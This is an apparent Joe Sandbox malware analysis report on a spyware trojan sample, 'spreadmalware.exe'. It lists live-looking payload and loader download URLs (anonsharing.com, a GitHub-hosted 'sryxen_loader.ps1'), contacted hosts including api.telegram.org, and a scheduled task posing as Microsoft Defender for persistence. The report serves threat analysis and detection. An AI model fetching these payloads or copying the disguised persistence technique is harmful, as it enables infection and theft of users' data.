https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939	powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A5E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s3.ca-central-1.wasabisys.com	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://objects.githubusercontent.com/github-production-release-asset-2e65be/805647875/b2a5a7dc-5521	powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?response-conte	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029FF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sigma.dreamhosters.com/User-Agent:	powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412	powershell.exe, 00000029.00000002.1905889415.0000016D1A55D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.gith	powershell.exe, 00000033.00000002.1811615016.000002B2004AE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://anonsharing.com	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 0000004B.00000003.1768359017.0000015D23849000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0	spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://objects.githubusercontent.com	powershell.exe, 00000029.00000002.1905889415.0000016D1A57B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com	powershell.exe, 00000033.00000002.1811615016.000002B2007E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sigma.drform-data;	powershell.exe, 00000029.00000002.1870747846.000000C00029C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://localhost:9222taskkill.jsC:	powershell.exe, 00000029.00000002.1870747846.000000C00017E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://raw.githubusercontent.com	powershell.exe, 00000033.00000002.1811615016.000002B200AA8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200063000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/evilbytecode/sryxen/releases/download/v1.0.0/sryxen_loader.ps1	powershell.exe, 00000029.00000002.1904552282.0000016D187D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://objects.githubuserconth	powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://objects.githubusercontent.com	powershell.exe, 00000029.00000002.1905889415.0000016D1B7FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/43a1723/test/main/download.	mshta.exe, 0000001B.00000002.1488443583.000001C85E520000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/43a1723/test/releases/download/siu/lmaoxclienX	powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sigma.dreamhosters.com/C:	powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.32.1	anonsharing.com	United States	13335	CLOUDFLARENETUS	false
224.0.2.60	unknown	Reserved	unknown	unknown	false
38.143.146.102	ca-central-1.wasabisys.com	United States	134520	GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHK	false
107.180.236.211	sigma.dreamhosters.com	United States	26347	DREAMHOST-ASUS	false
147.185.221.24	unknown	United States	12087	SALSGIVERUS	false
178.159.12.230	pastejustit.com	Netherlands	42831	UKSERVERS-ASUKDedicatedServersHostingandCo-Location	true
140.82.121.3	github.com	United States	36459	GITHUBUS	false
185.199.110.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
185.199.111.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585828
Start date and time:	2025-01-08 10:14:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	98
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	spreadmalware.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@155/97@8/11
EGA Information:	Successful, ratio: 40%
HCA Information:	Successful, ratio: 98% Number of executed functions: 44 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3896 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
Execution Graph export aborted for target spreadmalware.exe, PID 7356 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:15:03	API Interceptor	10x Sleep call for process: spreadmalware.exe modified
04:15:05	API Interceptor	5076469x Sleep call for process: powershell.exe modified
04:15:15	API Interceptor	2x Sleep call for process: WMIC.exe modified
05:52:18	API Interceptor	2x Sleep call for process: svchost.exe modified
05:52:30	API Interceptor	27x Sleep call for process: DisplayDriverUpdater.exe modified
11:52:28	Task Scheduler	Run new task: Microsoft Defender Threat Intelligence Handler path: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	random.exe	Get hash	malicious	CStealer	Browse
	random.exe	Get hash	malicious	CStealer	Browse
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Resource.exe	Get hash	malicious	Blank Grabber	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php
38.143.146.102	https://s3.ca-central-1.wasabisys.com/urbanlaravel/docs/i.html	Get hash	malicious	ReCaptcha Phish	Browse
107.180.236.211	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse
147.185.221.24	7fqul5Zr8Y.exe	Get hash	malicious	Unknown	Browse
	loader.exe	Get hash	malicious	Unknown	Browse
	loader.exe	Get hash	malicious	Unknown	Browse
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse
	BootstrapperV1.16.exe	Get hash	malicious	XWorm	Browse
	SharkHack.exe	Get hash	malicious	XWorm	Browse
	avaydna.exe	Get hash	malicious	Njrat	Browse
	ddos tool.exe	Get hash	malicious	XWorm	Browse
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sigma.dreamhosters.com	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse	107.180.236.211
raw.githubusercontent.com	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	185.199.108.133
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	185.199.108.133
	Customer.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	Solara.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	185.199.111.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	185.199.109.133
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
github.com	Customer.exe	Get hash	malicious	XWorm	Browse	140.82.121.4
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
api.telegram.org	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://t.me/hhackplus	Get hash	malicious	Unknown	Browse	149.154.167.99
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHK	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	38.143.51.244
	https://protect-us.mimecast.com/s/s4CGCG6xzRU5DEBYuK4iDJ?domain=menti.com	Get hash	malicious	ReCaptcha Phish	Browse	38.143.146.100
	https://s3.ca-central-1.wasabisys.com/urbanlaravel/docs/i.html	Get hash	malicious	ReCaptcha Phish	Browse	38.143.146.101
	https://menti.com/al4kcxh1n26b	Get hash	malicious	ReCaptcha Phish	Browse	38.143.146.100
	https://protect-us.mimecast.com/s/s4CGCG6xzRU5DEBYuK4iDJ?domain=menti.com	Get hash	malicious	ReCaptcha Phish	Browse	38.143.146.100
	WUDhJdWCg2.elf	Get hash	malicious	Mirai	Browse	38.143.41.11
	PO-INQUIRY-VALE-SP-2022-60.exe	Get hash	malicious	FormBook	Browse	38.143.25.232
	MV SEA VIKING DOCUMENTS.pdf.exe	Get hash	malicious	FormBook GuLoader	Browse	38.143.0.82
	BANK DETAILS-25012022-971332pdf.exe	Get hash	malicious	FormBook	Browse	38.143.0.82
	BL_CI_PL.exe	Get hash	malicious	GuLoader FormBook	Browse	38.143.25.232
DREAMHOST-ASUS	cZO.exe	Get hash	malicious	Unknown	Browse	208.113.128.162
	nsharm7.elf	Get hash	malicious	Mirai	Browse	173.236.155.152
	Memo - Impairment Test 2023 MEX010B (5).js	Get hash	malicious	Unknown	Browse	67.205.27.249
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	208.97.143.128
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	173.236.199.97
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	173.236.199.97
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse	107.180.236.211
	New Order.exe	Get hash	malicious	FormBook	Browse	173.236.199.97
	la.bot.arm6.elf	Get hash	malicious	Unknown	Browse	64.90.37.46
	https://new.goshenpubliclibrary.org/	Get hash	malicious	Unknown	Browse	173.236.138.114
CLOUDFLARENETUS	mail (4).eml	Get hash	malicious	Unknown	Browse	104.18.1.150
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	104.18.36.7
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar	Get hash	malicious	GhostRat	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	c2.hta	Get hash	malicious	Remcos	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	c2.hta	Get hash	malicious	Remcos	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133
	UXxZ4m65ro.exe	Get hash	malicious	Quasar	Browse	149.154.167.220 104.21.32.1 38.143.146.102 178.159.12.230 140.82.121.3 185.199.110.133 185.199.111.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Uni.exe	Get hash	malicious	Unknown	Browse
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse
	rPO767575.cmd	Get hash	malicious	DBatLoader	Browse
	Social_Security_Statement_Review.vbs	Get hash	malicious	Unknown	Browse
	Pollosappnuevo.bat	Get hash	malicious	XWorm	Browse
	PollosAplicaccion.bat	Get hash	malicious	XWorm	Browse
	gcapi64.cmd	Get hash	malicious	Unknown	Browse
	fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll	Get hash	malicious	Unknown	Browse
	fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x7786cc77, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.789969649112475
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
MD5:	7CEF4A993030A89B18603F30EFB4908A
SHA1:	A5B5DD1BEEA835B58EB8FD9E2024CEC6A346B185
SHA-256:	A4F2C422916586258F9C705F460A7A64AD943D9755E7341F2B02DF31928DF6AB
SHA-512:	A5223D42D45ACF20184948F26B2E992801758B53DCAA1ABA2151FD7F3E9EF9C91F5C3BAC29F9769CD65C42E4F5E91D636F7955D60BEF77F3B04BA812F806948F
Malicious:	false
Preview:	w..w... ...............X\...;...{......................0.`.....42...{5..4...}..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................4.DK.4...}..................i.M;.4...}...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spreadmalware.exe.log

Download File

Process:	C:\Users\user\Desktop\spreadmalware.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\error[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.4598794938059125
Encrypted:	false
SSDEEP:	96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
MD5:	939A9FBD880F8B22D4CDD65B7324C6DB
SHA1:	62167D495B0993DD0396056B814ABAE415A996EE
SHA-256:	156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
SHA-512:	91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
Malicious:	false
Preview:	...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\error[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.4598794938059125
Encrypted:	false
SSDEEP:	96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
